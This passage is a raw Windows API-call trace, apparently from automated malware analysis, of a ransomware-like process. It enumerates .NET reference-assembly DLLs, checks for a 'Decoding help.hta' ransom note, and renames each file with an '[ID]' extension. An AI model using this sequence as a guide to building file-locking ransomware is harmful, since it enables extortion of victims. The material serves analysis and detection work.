"c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.709] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa973a308, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa973a308, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9760469, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x82000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReachFramework.dll", cAlternateFileName="")) returned 1 [0056.709] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.709] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.709] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.709] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ReachFramework.dll") returned -1 [0056.709] lstrlenW (lpString="ReachFramework.dll") returned 18 [0056.709] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.709] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.709] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="ReachFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" [0056.709] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" [0056.709] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.709] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 1 [0056.709] lstrcmpW (lpString1=".", lpString2="RedistList") returned -1 [0056.709] lstrcmpW (lpString1="..", lpString2="RedistList") returned -1 [0056.709] lstrcmpiW (lpString1="windows", lpString2="RedistList") returned 1 [0056.710] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.710] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="RedistList" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" [0056.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" [0056.710] GlobalMemoryStatus (in: lpBuffer=0xfd8fd10 | out: lpBuffer=0xfd8fd10) [0056.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d68730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4b8 [0056.712] CloseHandle (hObject=0x4b8) returned 1 [0056.712] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9d79cd4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9d79cd4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9d9fe34, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x62000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IdentityModel.dll", cAlternateFileName="")) returned 1 [0056.712] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.712] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.713] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.IdentityModel.dll") returned -1 [0056.713] lstrlenW (lpString="System.IdentityModel.dll") returned 24 [0056.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.713] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.IdentityModel.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" [0056.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" [0056.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.713] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaae31b18, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0xaae31b18, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x53cd8e4b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IdentityModel.Selectors.dll", cAlternateFileName="")) returned 1 [0056.713] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.713] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.713] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.IdentityModel.Selectors.dll") returned -1 [0056.713] lstrlenW (lpString="System.IdentityModel.Selectors.dll") returned 34 [0056.713] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.713] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.IdentityModel.Selectors.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" [0056.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" [0056.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.715] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaef01e9, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0xaaef01e9, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x53d25107, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IO.Log.dll", cAlternateFileName="")) returned 1 [0056.715] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.715] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.715] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.IO.Log.dll") returned -1 [0056.716] lstrlenW (lpString="System.IO.Log.dll") returned 17 [0056.716] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.716] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.716] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.IO.Log.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" [0056.716] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" [0056.716] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.716] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa98b70cb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa98b70cb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa98b70cb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x57a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Printing.dll", cAlternateFileName="")) returned 1 [0056.716] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.716] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.716] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.716] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Printing.dll") returned -1 [0056.716] lstrlenW (lpString="System.Printing.dll") returned 19 [0056.716] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.716] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.716] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Printing.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" [0056.716] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" [0056.716] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.717] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ce1753, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9ce1753, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9d078b3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xcf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Runtime.Serialization.dll", cAlternateFileName="")) returned 1 [0056.717] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.717] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.717] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Runtime.Serialization.dll") returned -1 [0056.717] lstrlenW (lpString="System.Runtime.Serialization.dll") returned 32 [0056.717] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.717] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.717] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Runtime.Serialization.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" [0056.717] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" [0056.717] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: 